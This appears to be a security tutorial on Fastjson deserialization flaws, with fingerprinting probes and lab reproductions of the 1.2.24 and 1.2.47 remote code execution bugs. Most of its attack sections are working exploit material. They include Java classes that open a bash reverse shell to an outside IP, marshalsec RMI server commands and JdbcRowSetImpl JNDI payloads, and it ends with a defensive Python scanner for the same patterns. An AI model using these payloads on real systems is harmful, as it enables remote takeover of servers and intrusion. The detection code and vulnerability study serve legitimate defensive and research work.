1. Overview of Fastjson
1. Introduction to fastjson
Fastjson is Alibaba's open-source JSON parsing library. It parses JSON-formatted strings, serializes Java Beans into JSON strings, and deserializes JSON strings back into JavaBeans. It is known for high execution speed and a wide range of applications.
Advantages:
- Fast: whether serializing or deserializing, fastjson lives up to its name
- Powerful: supports the common JDK classes, including any Java Bean class, Collection, Map, Date or enum
- Zero dependencies: does not depend on any other class library
2. Vulnerability overview
- Fastjson<1.2.24 remote code execution (CNVD-2017-02833)
- Fastjson<=1.2.47 Remote Code Execution Vulnerability (CNVD-2019-22238)
- Fastjson < 1.2.60 remote denial of service vulnerability
- Fastjson <=1.2.68 deserialization remote code execution vulnerability
3. fastjson fingerprint recognition
- Add an extra key-value pair to the JSON. If the response shows no error, the backend may be fastjson, because Jackson by default rejects a body that contains keys the target class does not declare (an extra key produces an error there), while fastjson silently ignores it.
- Detect whether the backend uses fastjson through DNS echo. This is not always effective; it is a blind probe for when you do not know whether the backend is fastjson, or which version it runs. Each of the following is one probe body (several are intentionally malformed JSON that fastjson still accepts):
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0}
2. Fastjson <1.2.24 remote code execution
1. Vulnerability overview
Principle of the vulnerability: while parsing JSON, fastjson supports autoType, which instantiates the class named in the @type field and calls that class's set/get methods to populate its properties. By searching the classpath for classes whose setters or getters have dangerous side effects, malicious exploit chains can be constructed.
Affected version: fastjson <=1.2.24
Vulnerability analysis: https://xz.aliyun.com/t/8979
2. Vulnerability recurrence
- Access the vulnerability environment at http://your_ip:8090. A JSON document is returned, which shows the environment was built successfully.
- Create a Java file named shell.java with the following content (the public class name must match the file name for javac to accept it):
import java.lang.Runtime;
import java.lang.Process;

public class shell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = { "bash", "-i", ">&", "/dev/tcp/192.168.17.132/7777", "0>&1" };
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
- Run the compile command to obtain shell.class, and use python to start a temporary HTTP file server listening on port 8080.
Compile command:
javac shell.java
Start the file server:
python -m SimpleHTTPServer 8080
- Then use the marshalsec project to start an RMI server listening on port 9999 that refers to the remote class shell.class:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.17.132:8080/#shell" 9999
- Use Burp to intercept a request to the vulnerable page and send the following POST body (with the Content-Type header set to application/json):
Content-Type: application/json

{
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://192.168.17.132:9999/shell",
    "autoCommit": true
  }
}
- The reverse shell connects back successfully.
3. Fastjson<=1.2.47 remote code execution
1. Vulnerability overview
In June 2019, a vulnerability was disclosed in fastjson versions <=1.2.47. An attacker can use a specially constructed JSON string to bypass the whitelist check and execute arbitrary commands.
Basic principle: the checkAutoType blacklist can be bypassed.
Scope of influence: Fastjson<=1.2.47
Vulnerability analysis: https://www.sohu.com/a/438893775_750628
2. Vulnerability recurrence
- As before, access the vulnerability environment and capture a request with Burp Suite. To check whether the backend is fastjson, add an extra key-value pair to the JSON body and send it with POST; a normal response indicates fastjson.
- Begin the reproduction by constructing a malicious Java class and compiling it into a class file with:
javac shell.java
The content of shell.java:
import java.lang.Runtime;
import java.lang.Process;

public class shell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = { "/bin/bash", "-c", "bash -i >& /dev/tcp/x.x.x.x/port 0>&1" };
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}
- Start the HTTP file server and the RMI/LDAP server.
Start the HTTP file server:
python -m SimpleHTTPServer 8080
Start the RMI server (the marshalsec command below starts an RMI reference server, as in the previous section):
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.17.132:8080/#shell" 9999
- Send the PoC below (remember to change the Content-Type to application/json):
{
  "a": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://x.x.x.x:9999/shell",
    "autoCommit": true
  }
}
- Shell obtained successfully.
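As an added example (not part of the original post), the following Python scanner applies the request-body patterns shown in the sections above for detection: the DNS-echo fingerprint probes from section 1.3, the JdbcRowSetImpl/JNDI payload from the 1.2.24 section, and the java.lang.Class preload used in the 1.2.47 PoC. The class names and URI schemes are taken from the post; the severity labels, function names and the sample bodies (with placeholder hosts) are my own assumptions.

```python
"""Scan JSON request bodies for Fastjson autoType probes and JNDI gadget payloads.

Added example, not the post's own code. The @type class names and URI schemes
come from the post; severity labels and sample data are constructed here.
"""
import json
import re

# @type values the DNS-echo fingerprint probes in the post use.
DNS_PROBE_CLASSES = {
    "java.net.Inet4Address",
    "java.net.Inet6Address",
    "java.net.InetSocketAddress",
    "java.net.URL",
}
# JNDI gadget class used in the post's 1.2.24 and 1.2.47 payloads.
JNDI_GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
# Wrapper the 1.2.47 payload uses to get a denied class loaded before the real object.
CLASS_WRAPPER = "java.lang.Class"

# Regex extraction is deliberate: several fingerprint probes are malformed JSON
# that json.loads() rejects, yet Fastjson accepts them, so a parser-only check misses them.
AT_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"\\]+)"')
JNDI_URI_RE = re.compile(r'\b(?:rmi|ldap|ldaps|iiop)://[^\s"\'<>]+', re.IGNORECASE)


def extract_types(body: str) -> list:
    """All @type values in the raw body, in order of appearance."""
    return AT_TYPE_RE.findall(body)


def preloaded_classes(body: str) -> list:
    """Class names carried by {"@type":"java.lang.Class","val":...} objects.
    Needs well-formed JSON; returns [] when the body does not parse."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    found = []

    def walk(node):
        if isinstance(node, dict):
            if node.get("@type") == CLASS_WRAPPER and isinstance(node.get("val"), str):
                found.append(node["val"])
            for value in node.values():
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(doc)
    return found


def classify(body: str) -> dict:
    """Label one request body; severity is one of none/low/medium/high."""
    types = extract_types(body)
    findings = []
    if any(t in DNS_PROBE_CLASSES for t in types):
        findings.append("dns_echo_probe")
    if any(t in JNDI_GADGET_CLASSES for t in types):
        findings.append("jndi_gadget_class")
    if any(c in JNDI_GADGET_CLASSES for c in preloaded_classes(body)):
        findings.append("class_cache_bypass")  # the 1.2.47 shape
    if JNDI_URI_RE.search(body):
        findings.append("jndi_uri")
    if "jndi_gadget_class" in findings or "jndi_uri" in findings:
        severity = "high"
    elif "dns_echo_probe" in findings:
        severity = "medium"
    elif types:
        severity = "low"  # any @type from an untrusted client deserves a look
    else:
        severity = "none"
    return {"types": types, "findings": findings, "severity": severity}


# Constructed sample bodies (not captured traffic); hosts are placeholders.
SAMPLE_BODIES = [
    '{"name":"alice","age":30}',
    '{"@type":"java.net.Inet4Address","val":"example-dnslog.invalid"}',
    '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://attacker.invalid:9999/x","autoCommit":true}}',
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://attacker.invalid:9999/x","autoCommit":true}}',
]


def scan(bodies) -> list:
    """Return (severity, findings) per body; a SIEM rule would alert on medium and above."""
    return [(r["severity"], r["findings"]) for r in map(classify, bodies)]


if __name__ == "__main__":
    for body, (sev, findings) in zip(SAMPLE_BODIES, scan(SAMPLE_BODIES)):
        print(f"{sev:6s} {findings} <- {body[:60]}")
```

The raw-text pass and the structural pass complement each other: the regex catches the intentionally broken probe bodies that no JSON parser will load, while the tree walk is what distinguishes the 1.2.47 two-stage shape (a java.lang.Class wrapper naming a blacklisted class, followed by the gadget itself) from a single stray @type.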
4. Fastjson <=1.2.68 deserialization remote code execution
1. Vulnerability overview
Vulnerability profile:
This newer vulnerability still bypasses the restricted deserialization in versions 1.2.68 and earlier even when autoType is turned off. Compared with the 1.2.47 vulnerability it is more constrained: the 1.2.47 flaw bypasses the blacklist, whereas this one cannot, and it requires the target class to implement the AutoCloseable interface. The main JNDI gadgets are now on the blacklist, and the deserialized class is not allowed to implement the ClassLoader, DataSource or RowSet interfaces, which makes most JNDI gadgets unusable.
Scope of influence: Fastjson <=1.2.68, fastjson sec version < sec10
Vulnerability analysis: https://www.anquanke.com/post/id/208104
2. Vulnerability recurrence
Pending update…